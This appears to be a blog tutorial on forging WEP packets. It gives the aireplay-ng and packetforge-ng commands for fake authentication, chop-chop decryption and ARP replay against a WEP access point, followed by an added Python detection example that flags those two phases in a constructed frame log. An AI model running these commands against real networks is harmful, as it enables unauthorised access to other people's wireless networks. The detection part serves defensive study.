Advanced WEP Packet Forgery

Let’s say you’re in a location where the WEP network you’ve found is somewhat hardened against replay attacks, or there are practically no clients from which to capture a target packet. How can you get around this to generate data and crack the encryption?

Note: This assumes that you already have a network interface in monitor mode. If you haven’t done that yet, see the “Wireless Attack: WEP” posting for information on how to do this.

First you need to authenticate to the AP, but of course you don’t know the key to do so. We can use aireplay-ng to fake the authentication (MON_INT is the monitor interface throughout):

aireplay-ng -1 0 -e {ESSID} -a {BSSID} -h {YOUR_MAC} {MON_INT}

Next we need to perform a chop-chop attack to decrypt a single packet without knowing the key. We can do this with aireplay-ng as well:

aireplay-ng -4 -b {BSSID} -h {YOUR_MAC} {MON_INT}

Say “y” to the first packet you find, and let the decryption complete. You’ll get three files from this:

  • replay_src-MMDD-HHmmss.cap: This is the original (still encrypted) packet.
  • replay_dec-MMDD-HHmmss.cap: This is the decrypted packet.
  • replay_dec-MMDD-HHmmss.xor: This is the recovered keystream for that packet’s IV.

Now we’ll use that keystream with packetforge-ng to build a new ARP packet that we can use for the standard ARP replay attack:

packetforge-ng -0 -a {BSSID} -h {YOUR_MAC} -k {BSSID_IP} -l {ANY_IP} -y {XOR_FILE} -w arp-for-replay.cap

The output of this will be a single-packet capture file containing an ARP request that is ideal for replaying.

Now start up your capture (to crack, just like in the “Wireless Attack: WEP” posting). Odds are that you’ll need to re-fake your authentication first:

aireplay-ng -1 0 -e {ESSID} -a {BSSID} -h {YOUR_MAC} {MON_INT}

And now you can replay like normal with:

aireplay-ng -2 -r /path/to/arp-for-replay.cap {MON_INT}
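From the other side of the air, the whole procedure above has two very distinctive fingerprints that a wireless IDS can pick up: the chop-chop phase re-sends one frame with its tail cut off a byte at a time (a run of frame lengths stepping down by exactly one), and the replay phase blasts the identical forged frame, same IV and all, hundreds of times per second. The following is an added detection example, not code from the original post or from the aircrack-ng project. It works on a constructed, simplified frame log (timestamp, transmitter MAC, BSSID, WEP IV, frame length); the MAC addresses, IVs, thresholds and the Frame record type are all assumptions for illustration, and a real deployment would decode 802.11 data frames (e.g. with scapy’s Dot11WEP layer) to obtain those fields.

```python
"""WIDS-style heuristics for the chop-chop and ARP-replay phases described above.

Added example, not part of the original post. Operates on a constructed,
simplified view of monitor-mode frames rather than raw 802.11 captures.
"""
from collections import defaultdict, deque
from dataclasses import dataclass

# Constructed sample addresses (hypothetical, not from the post)
BSSID = "00:de:ad:be:ef:00"
STATION = "00:11:22:33:44:55"      # legitimate client
INJECTOR = "02:aa:bb:cc:dd:ee"     # client doing the injection


@dataclass(frozen=True)
class Frame:
    t: float      # capture time in seconds
    src: str      # transmitter MAC (802.11 address 2)
    bssid: str
    iv: str       # 3-byte WEP IV as hex
    length: int   # frame length in bytes


def detect_replay(frames, window=1.0, threshold=50):
    """Return (src, bssid, iv) keys seen >= threshold times within `window` seconds.

    A legitimate WEP station rotates its 24-bit IV on nearly every frame, so one
    station sending the identical IV dozens of times per second is the signature
    of a replayed frame (aireplay-ng -2 / -3).
    """
    recent = defaultdict(deque)
    alerts = set()
    for f in sorted(frames, key=lambda x: x.t):
        key = (f.src, f.bssid, f.iv)
        q = recent[key]
        q.append(f.t)
        while q and f.t - q[0] > window:     # keep only the sliding window
            q.popleft()
        if len(q) >= threshold:
            alerts.add(key)
    return alerts


def detect_chopchop(frames, min_run=8):
    """Return {(src, bssid): run_length} for sources whose frames shrink byte by byte.

    Chop-chop (aireplay-ng -4) re-sends a captured frame with its last byte cut off,
    then the next byte, and so on; seen from the air that is a run of distinct frame
    lengths descending in steps of exactly one byte. Each size is retried many times,
    so consecutive repeats are collapsed before measuring the run.
    """
    seen = defaultdict(list)   # (src, bssid) -> lengths in time order
    for f in sorted(frames, key=lambda x: x.t):
        seen[(f.src, f.bssid)].append(f.length)
    alerts = {}
    for key, lengths in seen.items():
        distinct = [l for i, l in enumerate(lengths) if i == 0 or l != lengths[i - 1]]
        best = run = 1
        for prev, cur in zip(distinct, distinct[1:]):
            run = run + 1 if cur == prev - 1 else 1
            best = max(best, run)
        if best >= min_run:
            alerts[key] = best
    return alerts


def build_sample_capture():
    """Constructed frame log: a benign client, then a chop-chop phase, then a replay phase."""
    frames = []
    # Benign client: fresh IV every frame; lengths vary by +37/-13, never by exactly -1.
    for i in range(30):
        frames.append(Frame(0.3 * i, STATION, BSSID, f"{i:06x}", 100 + (i * 37) % 50))
    # Chop-chop: lengths 100 down to 88, each guess retried 5 times, original IV reused.
    # (In practice this IV reuse can trip detect_replay too; spacing here keeps it below threshold.)
    t = 1.0
    for length in range(100, 87, -1):
        for _ in range(5):
            frames.append(Frame(t, INJECTOR, BSSID, "c0ffee", length))
            t += 0.05
    # Replay: one forged 68-byte ARP request sent 200 times in half a second.
    for i in range(200):
        frames.append(Frame(5.0 + i * 0.0025, INJECTOR, BSSID, "0a1b2c", 68))
    return frames


if __name__ == "__main__":
    capture = build_sample_capture()
    print("replay  :", detect_replay(capture))
    print("chopchop:", detect_chopchop(capture))
```

Both detectors key on per-source behaviour rather than on the BSSID alone, so a busy but legitimate network does not raise alerts; the thresholds are deliberately generous and would be tuned to the observed IV-reuse rate of the deployed client drivers, some of which are known to repeat IVs on their own.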

That’s it… good hunting!